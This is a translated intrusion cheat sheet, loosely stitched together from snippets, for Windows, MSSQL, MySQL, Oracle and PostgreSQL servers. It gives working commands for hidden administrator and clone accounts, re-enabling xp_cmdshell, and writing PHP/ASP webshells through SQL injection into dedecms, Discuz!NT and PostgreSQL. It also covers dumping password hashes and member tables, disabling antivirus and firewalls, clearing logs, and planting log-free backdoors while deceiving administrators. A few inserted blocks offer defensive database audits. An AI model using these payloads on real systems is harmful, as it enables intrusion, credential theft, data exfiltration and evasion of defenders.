1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to put it back.

2. A fairly neat way to build a clone account
First create an ordinary user account,
then export the registry, then delete the account in Computer Management,
then import the registry again and add the account to the Administrators group.

3. Reading the radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg

4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a key named "services.exe" here,
then create a string value under it
whose data is the full path of the trojan.

5. runas /user:guest cmd
Tests the user's privileges!

6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This actually relies on the tlntadmn command; for details run it with /? (it needs administrator privileges). Creating an identical user so that NTLM authentication goes through needs no explanation from me, right?

7. After the intrusion: patching the holes, cleaning traces, planting backdoors:
The basic holes must be patched, such as SU privilege escalation and SA injection. For DBO injection consider killing off xp_treelist and xp_regread; just note the web directory yourself. You must remember to clean your traces. For connecting to SQL Server, Enterprise Manager is better; Query Analyzer leaves records at HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. When clearing IIS logs, don't use an AIO-type tool that simply deletes the whole log; pick a logcleaner-type tool that removes only the access records for a given IP. If you can get the administrator password through gina, log in as him to clean the logs and do the final trace cleanup with WYWZ. That said, cleaning by hand is safer. Finally, leave a backdoor that produces no log entries. Several one-liner backdoors, a standard backdoor and a cfm backdoor: I usually never go without them. Remember to change the timestamps. There is also a rather ruthless trick: if the machine is just an ordinary bot, drop a TXT on the administrator's desktop telling him that you got in, placed some backdoor and added some user (not your truly important backdoor, of course) and that he should clean it up. That way you stand a good chance of keeping your real backdoor.

8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c <command>'

For example:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'
9. MSSQL Server 2005 has xp_cmdshell switched off by default; to enable it you have to turn it on through the advanced options.
This can be done directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
Then:
;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then
dbcc addextendedproc("xp_cmdshell","xplog70.dll")

10. A new way to restore xp_cmdshell
Once the extended stored procedures have been deleted there is a very simple way to restore them.
Deletion:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restoration:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly, regardless of whether sp_addextendedproc still exists.

-----------------------------

Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to shut cmdshell down:
sp_dropextendedproc "xp_cmdshell"
-------------------------
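The defender's counterpart to the xp_cmdshell enable/restore statements above: a T-SQL audit that reports whether the switches and extended procedures involved are present and which logins could flip them back on, followed by the statements that turn them off. This is example code written for this edit, not from the original post; it assumes SQL Server 2005 or later (sys.configurations, sys.objects, sys.server_principals) and a login that is a member of sysadmin.

```sql
-- Defensive audit for the xp_cmdshell / OLE Automation switches discussed above.
-- Example added for this edit, not from the original post. Assumes SQL Server 2005+
-- (sys.configurations, sys.objects, sys.server_principals) and a sysadmin login.

-- 1. Are the switches on? value_in_use is what the engine is running with right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures');

-- 2. Do the extended procedures the post restores with dbcc addextendedproc exist?
--    type 'X' = extended stored procedure (the post's sysobjects xtype='x' check, on sys.objects).
SELECT name, type_desc, create_date
FROM master.sys.objects
WHERE type = 'X'
  AND name IN ('xp_cmdshell', 'sp_OACreate', 'sp_OAMethod', 'xp_regread', 'xp_dirtree');

-- 3. Who could switch them back on? Any sysadmin can run sp_configure, and dropping
--    sp_addextendedproc does not help because dbcc addextendedproc bypasses it,
--    so the sysadmin membership list is the real control.
SELECT name AS login_name, type_desc, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
  AND IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- 4. Remediation: advanced options must be visible to change the two switches,
--    so expose them, turn both features off, then hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 3 is the one that matters in practice: the post's own observation that dbcc addextendedproc works after sp_addextendedproc is dropped means the on/off switch is only as strong as the list of logins allowed to run sp_configure.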
Clear the 3389 login records with a single built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.

View the current user's privileges in mysql:
show grants for current_user;
The following statements create a user with the same privileges as root. You will have run into this when taking a site: root's mysql can only connect locally and refuses connections from outside. The method below solves that. The statements create a user itpro with password 123 and root-equivalent privileges, allowed to connect from any host, so you can conveniently work on the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to remove your footprints:
Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro` ;

Getting SYSTEM privileges as the current user
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec,user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Bypassing the CAPTCHA restriction to get into the admin panel and grab a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry, restart IE, and that's it.

Writing a shell via union
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
Applied to the dedecms injection vulnerability: writes a shell without touching the admin panel.

In the dedecms admin panel, when there is no file manager and no outfile privilege:
under Plugin Management, Virus Scan,
write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>
in the format above.

In oracle, after logging in as a low-privileged user you can run the following to query the hashes of sys and other users, then crack them with cain:
Code:
select username,password from dba_users;
mysql remote connection user
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
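A defensive counterpart to the two MySQL account blocks above (the itpro account and the nosec account): an audit of accounts reachable from any host or holding FILE, the secure_file_priv setting that decides whether INTO OUTFILE / DUMPFILE can write outside a confined directory (the mechanism this page later uses to drop files into the Startup folder), and the revoke/drop cleanup. This is example code for this edit, not the post's own; it assumes MySQL 5.x or 8.x and a login that can read the mysql system schema. Note that the GRANT ... IDENTIFIED BY form the post uses was removed in MySQL 8, so only CREATE USER / REVOKE / DROP USER appear here.

```sql
-- Defensive audit for the itpro / nosec style accounts created above.
-- Example added for this edit, not from the original post. Assumes MySQL 5.x or 8.x
-- and a login that can read the mysql system schema.

-- 1. Accounts reachable from any host, or holding privileges that reach the OS:
--    FILE is what SELECT ... INTO OUTFILE / DUMPFILE needs; SUPER and GRANT OPTION
--    let an account widen its own access.
SELECT User, Host, Super_priv, File_priv, Grant_priv
FROM mysql.user
WHERE Host = '%'
   OR File_priv = 'Y'
   OR (Super_priv = 'Y' AND User <> 'root');

-- 2. Where FILE can actually write. Empty string = anywhere the server process can write
--    (the case the post relies on); NULL = import/export disabled; a path = confined to it.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 3. The exact grants of a suspicious account (the post's account name used as the example).
SHOW GRANTS FOR 'itpro'@'%';

-- 4. Remediation: strip the grants, drop the account, and confine FILE.
REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'itpro'@'%';
DROP USER 'itpro'@'%';
-- secure_file_priv cannot be changed at runtime; set it in my.cnf and restart:
--   [mysqld]
--   secure_file_priv = /var/lib/mysql-files
```

Query 1 is the one to schedule: a Host of '%' combined with FILE is exactly the combination that turns a database login into a file write on the server, regardless of which user name it was created under.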
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the terminal port

xp & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Change the terminal port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 firewall restriction on terminal services port 3389 and the restriction on connecting IPs

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5. Enable the Win2000 terminal on port 3389 (reboot required)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

6. Force a reboot of Win2000 & Win2003 (the system reboots automatically once the last line has run)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (reboot required)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal has exceeded its maximum number of connections, use this command to connect

mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (everyone gets full control of the C: drive)

cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
' make sure the three Terminal Server keys exist
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' allow terminal connections
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' set port 3389 in both places
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' reboot so the change takes effect
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Delete the awgina.dll registry value:
Code:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to turn off LM hashes.
Database security: common commands for intruding an Oracle database
Recently I ran into a server using an Oracle database; after cramming Oracle and consulting experts I finally got all the user passwords of the site's admin interface. I found Oracle really cumbersome to operate, so to spare you brothers some detours I have put together the commands needed during the intrusion.
1. su - oracle: not required; useful when you don't have the DBA password, since it lets you enter the sqlplus interface without a password.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba; (as sysoper) or
connect internal/oracle AS SYSDBA; (scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$database; view the database structure fields
7. How to see which users hold SYSDBA / SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user; view the user of the current database connection
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show the full column structure of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Fetch the records in CQI.T_BBS_XUSER:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant the user privileges:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change database users' passwords: (change the passwords of sys and system to test.)
alter user sys identified by test;
alter user system identified by test;
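The defender's view of the Oracle steps above (default passwords, SYSDBA grants, newly added accounts): an audit that lists accounts still on vendor default passwords, who can connect AS SYSDBA or holds DBA, and accounts created recently, followed by the lock/revoke statements. Example code added for this edit, not from the original post; it assumes Oracle 11g or later (DBA_USERS_WITH_DEFPWD) and a login with the DBA role or SELECT ANY DICTIONARY. test11 and scott are the post's own account names, reused here as placeholders.

```sql
-- Defensive audit for the Oracle steps above (default passwords, SYSDBA grants, new accounts).
-- Example added for this edit, not from the original post. Assumes Oracle 11g or later
-- (DBA_USERS_WITH_DEFPWD) and a login with the DBA role or SELECT ANY DICTIONARY.

-- 1. Accounts still on a vendor default password: sys/change_on_install, system/manager
--    and scott/tiger are exactly the pairs the post tries first.
SELECT username FROM dba_users_with_defpwd ORDER BY username;

-- 2. Who can connect AS SYSDBA / SYSOPER (password-file users), and who holds DBA.
SELECT username, sysdba, sysoper FROM v$pwfile_users;
SELECT grantee FROM dba_role_privs WHERE granted_role = 'DBA' ORDER BY grantee;

-- 3. Accounts created in the last 30 days and their status: a test11-style account surfaces here.
SELECT username, created, account_status
FROM dba_users
WHERE created > SYSDATE - 30
ORDER BY created DESC;

-- 4. Remediation for a hit (test11 and scott are the post's example accounts; replace as needed).
REVOKE DBA FROM test11;
REVOKE SYSDBA FROM test11;
ALTER USER test11 ACCOUNT LOCK;
ALTER USER scott ACCOUNT LOCK;
ALTER USER system IDENTIFIED BY "<new strong password>";
```

Query 2 is the same V$PWFILE_USERS lookup the post uses in step 7, read the other way round: every row in it is a login that can start, stop and rewrite the database, so the list should be short and known.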
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml  database connection configuration
\WEB-INF\server.xml  similar to http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml  file directory structure

spring.properties contains the name of the hibernate.cfg.xml

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
If none of these can be found, go and look at the class files.
Viewing shared files inside a virtual machine:
run this in cmd inside the VM
\\.host\Shared Folders

Tips for finding the terminal port from a cmdshell
Finding the terminal:
Step 1: Tasklist /SVC lists all processes and system services with their PIDs!
The terminal's service name is TermService.
Step 2: use netstat -ano to list the PID for every port!
Find the port that corresponds to that PID.

Querying the password hash in sql server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
Full code for adding a user through mysql on a Chinese-language operating system:
use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language version:
use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe';
drop table a;
A note on how to deal with that perverse Norton
Look up the path of the Norton service:
sc qc ccSetMgr
Then set the permissions to deny access. Go all the way:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That takes care of it. But when you are done, remember to restore the permissions:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F

SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
Some notes on postgresql injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a custom C function backed by libc, the other uses pl/python.
Of course, the postgresql version must be newer than 8.x for these.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, redirecting its output to a file:
SELECT system('uname -a > /tmp/test')

COPY the output file into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the echoed output back from the output table to judge whether the command ran:
SELECT system_out FROM stdout
Below is a test example

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

net stop sharedaccess: stops the default firewall
netsh firewall show config: shows the default firewall configuration
netsh firewall set notifications disable: disables the notification when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost: adds a program that the default firewall allows
How to change the 3389 port (harder to pick up by scanning once changed)
Change the port setting on the server side; two places in the registry need changing:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
the PortNumber value, default 3389; change it to the port you want, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
the PortNumber value, default 3389; change it to the port you want, e.g. 6000

That is all; reboot the system and it takes effect.

Script to log 3389 remote logins
Save as a bat file:
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.

/v:<server[:port]> -- specifies the terminal server to connect to.

/console -- connects to the console session of the server.

/f -- starts the client in full-screen mode.

/w:<width> -- specifies the width of the remote desktop screen.

/h:<height> -- specifies the height of the remote desktop screen.

/edit -- opens the specified .rdp file for editing.

/migrate -- migrates legacy connection files created with Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which amounts to logging on to the computer a second time. In other words, connecting with the console parameter gives you the desktop shown on the monitor. Give it a try; it comes in handy sometimes, especially with some software that
mstsc /console /v:124.42.126.xxx  gets past the limit on the number of terminal connections
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2  view users' passwords
Export a shell directly from an access database, provided table a exists in the access database and you know the site's real path:
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. During manual MSSQL injection, if you cannot bounce the output out, most of the time you read the records one at a time, which is exhausting. Here is one statement that reads all the data at once:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
How to shut down McAfee: // requires SYSTEM privileges; use at or psexec -s cmd.exe
You can upload .com files, e.g. nc.com, to get around McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from a DOS prompt.
exec master..xp_cmdshell 'net user'
Executing commands in mssql.
Query for mssql password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
mssql database shrinking

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar as 200M volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database to game.bak at D:\WebSites\game.com\UpFileList\game.bak
Discuz!nt 3.5 penetration key points:
(1) Visit site-url/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) One-liner backdoor address: http://somesite.com.cn/tools/rss.aspx, password pass
d:\rar.exe a -r d:\1.rar d:\website\
Recursively compresses website;
note the path of rar.exe
<?php

$telok = "0${@eval($_POST[xxoo])}";

$username = "123456";

$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";

?>
PHP: a one-line trojan inserted into a one-liner field whose input is not filtered

Dumping the database when the web server and database server are separate:
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Constraints meant a large shell could not be written, only a one-liner; that is actually enough to accomplish anything, it is just not intuitive or convenient, for example for dumping the database.
What is used here is the shell client's expert mode (write your own code).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading

ini_set('display_errors', 1);
